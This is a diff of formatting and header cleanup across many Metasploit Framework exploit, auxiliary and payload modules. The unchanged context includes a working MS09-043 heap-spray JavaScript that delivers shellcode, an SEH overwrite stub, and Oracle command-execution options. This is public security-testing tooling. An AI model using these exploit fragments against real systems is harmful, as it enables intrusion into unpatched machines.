@@ -116,20 +126,20 @@ class Metasploit3 < Msf::Auxiliary
end
end
end
[ base_sock, targ_sock ].each {|s| s.close }
print_status("Analyzing results for #{results.keys.length} entries...")
results.each_key do |entry|
n_add = []
n_sub = []
# Look for additional entries in the target NS
if(results[entry][:targ])
results[entry][:targ].each_key do |rtype|
results[entry][:targ].each_key do |rtype|
if(not results[entry][:base] or not results[entry][:base][rtype])
results[entry][:targ][rtype].sort.each do |ref|
n_sub << (" + #{entry} #{rtype} #{ref}")
@@ -137,7 +147,7 @@ class Metasploit3 < Msf::Auxiliary
end
end
end
if (results[entry][:base])
results[entry][:base].each_key do |rtype|
@@ -160,15 +170,15 @@ class Metasploit3 < Msf::Auxiliary
if(not results[entry][:base][rtype].include?(ref))
n_add << (" + #{entry} #{rtype} #{ref}")
end
end
end
end
end
end
n_sub.each {|s| print_status(s) }
n_add.each {|s| print_status(s) }
end
end
end
end
modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb
+1 -1
View File
@@ -26,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2010-0870' ],
modules/auxiliary/sqli/oracle/dbms_export_extension.rb
+1 -1
View File
@@ -26,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision:$',
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2006-2081' ],
modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb
+9 -6
View File
@@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@@ -15,10 +19,9 @@ class Metasploit3 < Msf::Auxiliary
super(update_info(info,
'Name' => ' DBMS_JVM_EXP_PERMS 10gR2, 11gR1/R2 OS Command Execution',
'Description' => %q{
This module exploits a flaw (0 day) in DBMS_JVM_EXP_PERMS package that allows
This module exploits a flaw (0 day) in DBMS_JVM_EXP_PERMS package that allows
any user with create session privilege to grant themselves java IO privileges.
Identified by David Litchfield. Works on 10g R2, 11g R1 and R2 (Windows only)
},
'Author' => [ 'sid[at]notsosecure.com' ],
'License' => MSF_LICENSE,
@@ -30,10 +33,10 @@ class Metasploit3 < Msf::Auxiliary
],
'DisclosureDate' => 'Feb 1 2010'))
register_options(
[
OptString.new('CMD', [ false, 'CMD to execute.', "echo metasploit >> %SYSTEMDRIVE%\\\\unbreakable.txt"]),
], self.class)
register_options(
[
OptString.new('CMD', [ false, 'CMD to execute.', "echo metasploit >> %SYSTEMDRIVE%\\\\unbreakable.txt"]),
], self.class)
end
def run
modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb
+9 -6
View File
@@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@@ -16,9 +20,8 @@ class Metasploit3 < Msf::Auxiliary
'Name' => ' DBMS_JVM_EXP_PERMS 11g R1/R2 OS Code Execution',
'Description' => %q{
This module exploits a flaw (0 day) in DBMS_JVM_EXP_PERMS package that allows
any user with create session privilege to grant themselves java IO privileges.
any user with create session privilege to grant themselves java IO privileges.
Identified by David Litchfield. Works on 11g R1 and R2 (Windows only).
},
'Author' => [ 'sid[at]notsosecure.com' ],
'License' => MSF_LICENSE,
@@ -30,10 +33,10 @@ class Metasploit3 < Msf::Auxiliary
],
'DisclosureDate' => 'Feb 1 2010'))
register_options(
[
OptString.new('CMD', [ false, 'CMD to execute.', "echo metasploit >> %SYSTEMDRIVE%\\\\unbreakable.txt"]),
], self.class)
register_options(
[
OptString.new('CMD', [ false, 'CMD to execute.', "echo metasploit >> %SYSTEMDRIVE%\\\\unbreakable.txt"]),
], self.class)
end
def run
modules/encoders/x86/alpha_mixed.rb
+2 -6
View File
@@ -9,13 +9,10 @@
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rex/encoder/alpha2/alpha_mixed'
class Metasploit3 < Msf::Encoder::Alphanum
Rank = LowRanking
def initialize
@@ -64,7 +61,7 @@ class Metasploit3 < Msf::Encoder::Alphanum
buf + Rex::Encoder::Alpha2::AlphaMixed::gen_decoder(reg, off)
end
#
# Configure SEH getpc code on Windows
#
@@ -73,7 +70,7 @@ class Metasploit3 < Msf::Encoder::Alphanum
datastore['AllowWin32SEH'] = true
end
end
#
# Encodes a one byte block with the current index of the length of the
# payload.
@@ -89,4 +86,3 @@ class Metasploit3 < Msf::Encoder::Alphanum
state.encoded += Rex::Encoder::Alpha2::AlphaMixed::add_terminator()
end
end
modules/exploits/multi/fileformat/maple_maplet.rb
+3 -3
View File
@@ -23,11 +23,11 @@ class Metasploit3 < Msf::Exploit::Remote
This module harnesses Maple's ability to create files and execute commands
automatically when opening a Maplet. All versions up to 13 are suspected
vulnerable. Testing was conducted with version 13 on Windows. Standard security
settings prevent code from running in a normal maple worksheet without user
settings prevent code from running in a normal maple worksheet without user
interaction, but those setting do not prevent code in a Maplet from running.
In order for the payload to be executed, an attacker must convince someone to
open a specially modified .maplet file with Maple. By doing so, an attacker can
open a specially modified .maplet file with Maple. By doing so, an attacker can
execute arbitrary code as the victim user.
},
'License' => MSF_LICENSE,
@@ -115,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote
fname << ".exe"
end
fhandle = rand_text_alpha(3+rand(15))
#Write maple commands to create executable
content = fhandle + " := fopen(\"#{fname}\",WRITE,BINARY);\n"
exe = binary.unpack('C*')
modules/exploits/multi/ftp/wuftpd_site_exec_format.rb
+1
View File
@@ -27,6 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote
specifiers, an attacker can corrupt memory and execute arbitrary code.
},
'Author' => [ 'jduck' ],
'Version' => '$Revision$',
'References' =>
[
['OSVDB', '11805'],
modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb
+2 -3
View File
@@ -1,5 +1,5 @@
##
# $Id: wireshark_lwres_getaddrbyname.rb 8364 2010-02-03 18:24:42Z jduck $
# $Id$
##
##
@@ -9,7 +9,6 @@
# http://metasploit.com/framework/
##
require 'msf/core'
#require 'racket'
@@ -48,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
'redsand' # windows target/testing
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 8364 $',
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2010-0304' ],
modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb
+3
View File
@@ -19,6 +19,9 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'MacOS X QuickTime RTSP Content-Type Overflow',
# Description?
# Author?
'Version' => '$Revision$',
'Platform' => 'osx',
'References' =>
[
modules/exploits/solaris/sunrpc/ypupdated_exec.rb
+10 -1
View File
@@ -1,7 +1,16 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
modules/exploits/unix/webapp/guestbook_ssi_exec.rb
+2 -2
View File
@@ -49,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby bash telnet',
}
},
},
'Platform' => [ 'unix', 'win', 'linux' ],
'Arch' => ARCH_CMD,
'Targets' => [[ 'Automatic', { }]],
@@ -81,6 +81,6 @@ class Metasploit3 < Msf::Exploit::Remote
req2 = send_request_raw({
'uri' => datastore['URIOUT'],
}, 25)
end
end
modules/exploits/windows/backdoor/energizer_duo_payload.rb
+8 -6
View File
@@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@@ -5,10 +9,8 @@
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
@@ -18,10 +20,10 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'Energizer DUO Trojan Code Execution',
'Description' => %q{
This module will execute an arbitrary payload against
any system infected with the Arugizer trojan horse. This
backdoor was shipped with the software package accompanying
the Energizer Duo USB battery charger.
This module will execute an arbitrary payload against
any system infected with the Arugizer trojan horse. This
backdoor was shipped with the software package accompanying
the Energizer Duo USB battery charger.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
modules/exploits/windows/browser/adobe_jbig2decode.rb
+17 -14
View File
@@ -1,9 +1,13 @@
###
## This file is part of the Metasploit Framework and may be subject to
## redistribution and commercial restrictions. Please see the Metasploit
## Framework web site for more information on licensing and terms of use.
## http://metasploit.com/framework/
###
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'zlib'
@@ -18,17 +22,17 @@ class Metasploit3 < Msf::Exploit::Remote
'Name' => 'Adobe JBIG2Decode Memory Corruption Exploit',
'Description' => %q{
This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier.
This module relies upon javascript for the heap spray.
This module relies upon javascript for the heap spray.
},
'License' => MSF_LICENSE,
'Author' =>
[
# Metasploit implementation
'natron',
# bl4cksecurity blog explanation of vuln [see References]
'xort', 'redsand',
# obfuscation techniques and pdf template from util_printf
'MC', 'Didier Stevens <didier.stevens[at]gmail.com>',
# Metasploit implementation
'natron',
# bl4cksecurity blog explanation of vuln [see References]
'xort', 'redsand',
# obfuscation techniques and pdf template from util_printf
'MC', 'Didier Stevens <didier.stevens[at]gmail.com>',
],
'Version' => '$Revision$',
'References' =>
@@ -54,7 +58,6 @@ class Metasploit3 < Msf::Exploit::Remote
],
'DisclosureDate' => 'Feb 2009',
'DefaultTarget' => 0))
end
def autofilter
modules/exploits/windows/browser/adobe_utilprintf.rb
+12 -8
View File
@@ -1,9 +1,13 @@
###
## This file is part of the Metasploit Framework and may be subject to
## redistribution and commercial restrictions. Please see the Metasploit
## Framework web site for more information on licensing and terms of use.
## http://metasploit.com/framework/
###
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'zlib'
@@ -18,8 +22,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Name' => 'Adobe util.printf() Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional
< 8.1.3. By creating a specially crafted pdf that a contains malformed util.printf()
entry, an attacker may be able to execute arbitrary code.
< 8.1.3. By creating a specially crafted pdf that a contains malformed util.printf()
entry, an attacker may be able to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC', 'Didier Stevens <didier.stevens[at]gmail.com>' ],
modules/exploits/windows/browser/ms09_043_owc_msdso.rb
+21 -21
View File
@@ -35,7 +35,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'MSB', 'MS09-043' ],
[ 'URL', 'http://xeye.us/blog/2009/07/one-0day/' ],
[ 'URL', 'http://www.microsoft.com/technet/security/advisory/973472.mspx' ],
],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
@@ -43,17 +43,17 @@ class Metasploit3 < Msf::Exploit::Remote
'Payload' =>
{
'Space' => 1024,
'BadChars' => '',
'BadChars' => '',
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C } ]
[ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C } ]
],
'DisclosureDate' => 'Jul 13 2009',
'DefaultTarget' => 0))
@javascript_encode_key = rand_text_alpha(rand(10) + 10)
end
@@ -68,45 +68,45 @@ class Metasploit3 < Msf::Exploit::Remote
return if ((p = regenerate_payload(cli)) == nil)
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
shellcode = Rex::Text.to_unescape(p.encoded)
retaddr = Rex::Text.to_unescape([target.ret].pack('V'))
js = %Q|
var xshellcode = unescape("#{shellcode}");
var xarray = new Array();
var xls = 0x81000-(xshellcode.length*2);
var xbigblock = unescape("#{retaddr}");
while( xbigblock.length < xls / 2) { xbigblock += xbigblock; }
var xlh = xbigblock.substring(0, xls / 2);
delete xbigblock;
for(xi=0; xi<0x99*2; xi++) {
xarray[xi] = xlh + xlh + xshellcode;
}
CollectGarbage();
var xobj = new ActiveXObject("OWC10.Spreadsheet");
xe = new Array();
xe.push(1);
xe.push(2);
xe.push(0);
xe.push(window);
for(xi=0; xi < xe.length; xi++){
for(xj=0; xj<10; xj++){
try { xobj.Evaluate(xe[xi]); } catch(e) { }
}
}
window.status = xe[3] + '';
for(xj=0; xj<10; xj++){
try{ xobj.msDataSourceObject(xe[3]); } catch(e) { }
}
@@ -118,14 +118,14 @@ class Metasploit3 < Msf::Exploit::Remote
'Variables' => %W{ xshellcode xarray xls xbigblock xlh xi xobj xe xj}
}
).to_s
# Encode the javascript payload with the URI key
# js = encrypt_js(js, @javascript_encode_key)
# Fire off the page to the client
send_response(cli, "<html><script language='javascript'>#{js}</script></html>")
# Handle the payload
handler(cli)
end
modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb
+1 -1
View File
@@ -1,5 +1,5 @@
##
# $id$
# $Id$
##
##
modules/exploits/windows/fileformat/adobe_jbig2decode.rb
+10 -6
View File
@@ -1,9 +1,13 @@
###
## This file is part of the Metasploit Framework and may be subject to
## redistribution and commercial restrictions. Please see the Metasploit
## Framework web site for more information on licensing and terms of use.
## http://metasploit.com/framework/
###
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'zlib'
modules/exploits/windows/fileformat/mediajukebox.rb
+7 -4
View File
@@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@@ -17,9 +21,9 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'Media Jukebox 8.0.400 Buffer Overflow Exploit (SEH)',
'Description' => %q{
This module exploits a stack overflow in Media Jukebox 8.0.400
By creating a specially crafted m3u or pls file, an an attacker may be able
to execute arbitrary code.
This module exploits a stack overflow in Media Jukebox 8.0.400
By creating a specially crafted m3u or pls file, an an attacker may be able
to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' =>
@@ -70,4 +74,3 @@ class Metasploit3 < Msf::Exploit::Remote
end
end
modules/exploits/windows/fileformat/mymp3player_m3u.rb
+2 -2
View File
@@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
# direct ret overwrite at offset 1024
# nseh overwrite at offset 1040
ret_offset = 1024
@@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
stub = Metasm::Shellcode.assemble(Metasm::Ia32.new, stub).encode_string
m3u[seh_offset - stub.length, stub.length] = stub
# Jump back to the stub
jmp2 = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + stub.length.to_s).encode_string
seh = ''
modules/exploits/windows/ftp/vermillion_ftpd_port.rb
+1
View File
@@ -52,6 +52,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
'jduck' # metasploit module
],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '62163' ],
modules/exploits/windows/http/bea_weblogic_jsessionid.rb
+1
View File
@@ -26,6 +26,7 @@ class Metasploit3 < Msf::Exploit::Remote
long JSESSION cookie value can lead to arbirtary code execution.
},
'Author' => 'pusscat',
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2008-5457' ],
modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb
+1
View File
@@ -27,6 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote
You may have to run this twice due to timing issues with handlers.
},
'Author' => 'pusscat',
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2008-4008' ],
modules/exploits/windows/http/hp_nnm_ovwebhelp.rb
+1 -1
View File
@@ -26,7 +26,7 @@ class Metasploit3 < Msf::Exploit::Remote
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2009-4178' ],
modules/exploits/windows/http/httpdx_handlepeer.rb
+1
View File
@@ -45,6 +45,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Trancer <mtrancer[at]gmail.com>', # Metasploit implementation
'jduck'
],
'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'http://www.pank4j.com/exploits/httpdxb0f.php' ],
modules/exploits/windows/http/httpdx_tolog_format.rb
+1
View File
@@ -33,6 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
'jduck' # original discovery and metasploit module
],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '60182' ]
modules/payloads/singles/linux/x86/chmod.rb
+11 -1
View File
@@ -1,5 +1,15 @@
require 'msf/core'
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
###
# Linux Chmod(file, mode)
modules/payloads/singles/linux/x86/exec.rb
-2
View File
@@ -9,10 +9,8 @@
# http://metasploit.com/framework/
##
require 'msf/core'
###
#
# Exec
modules/payloads/singles/windows/exec.rb
-2
View File
@@ -9,11 +9,9 @@
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/payload/windows/exec'
###
#
# Executes a command on the target machine
modules/payloads/stagers/osx/x86/bind_tcp.rb
+11
View File
@@ -1,3 +1,14 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/handler/bind_tcp'
modules/payloads/stages/netware/shell.rb
+4
View File
@@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
modules/payloads/stages/osx/x86/bundleinject.rb
-2
View File
@@ -9,11 +9,9 @@
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/payload/osx/bundleinject'
###
#
# Injects an arbitrary DLL in the exploited process.
modules/payloads/stages/windows/dllinject.rb
+11 -2
View File
@@ -1,9 +1,19 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
# Copyright (c) 2008 Stephen Fewer of Harmony Security (www.harmonysecurity.com)
require 'msf/core'
require 'msf/core/payload/windows/reflectivedllinject'
###
#
# Injects an arbitrary DLL in the exploited process via a reflective loader.
@@ -14,4 +24,3 @@ module Metasploit3
include Msf::Payload::Windows::ReflectiveDllInject
end
modules/payloads/stages/windows/patchupdllinject.rb
+1 -3
View File
@@ -9,11 +9,9 @@
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/payload/windows/dllinject'
###
#
# Injects an arbitrary DLL in the exploited process.
@@ -23,4 +21,4 @@ module Metasploit3
include Msf::Payload::Windows::DllInject
end
end
modules/payloads/stages/windows/vncinject.rb
+11
View File
@@ -1,3 +1,14 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
# Copyright (c) 2008 Stephen Fewer of Harmony Security (www.harmonysecurity.com)
require 'msf/core'
modules/payloads/stages/windows/x64/vncinject.rb
+5 -5
View File
@@ -21,7 +21,7 @@ require 'msf/base/sessions/vncinject'
module Metasploit3
include Msf::Payload::Windows::ReflectiveDllInject_x64
def initialize(info = {})
super(update_info(info,
'Name' => 'Windows x64 VNC Server (Reflective Injection)',
@@ -29,7 +29,7 @@ module Metasploit3
'Description' => 'Inject a VNC Dll via a reflective loader (Windows x64) (staged)',
'Author' => [ 'sf' ],
'Session' => Msf::Sessions::VncInject ))
# Override the DLL path with the path to the meterpreter server DLL
register_options(
@@ -85,9 +85,9 @@ module Metasploit3
flags = 0
flags |= 1 if (datastore['DisableCourtesyShell'])
flags |= 2 if (datastore['DisableSessionTracking'])
# Transmit the one byte flag
session.rstream.put([ flags ].pack('C'))
@@ -104,7 +104,7 @@ module Metasploit3
print_status("Launched vnciewer in the background.")
end
end
super
end

Some files were not shown because too many files have changed in this diff Show More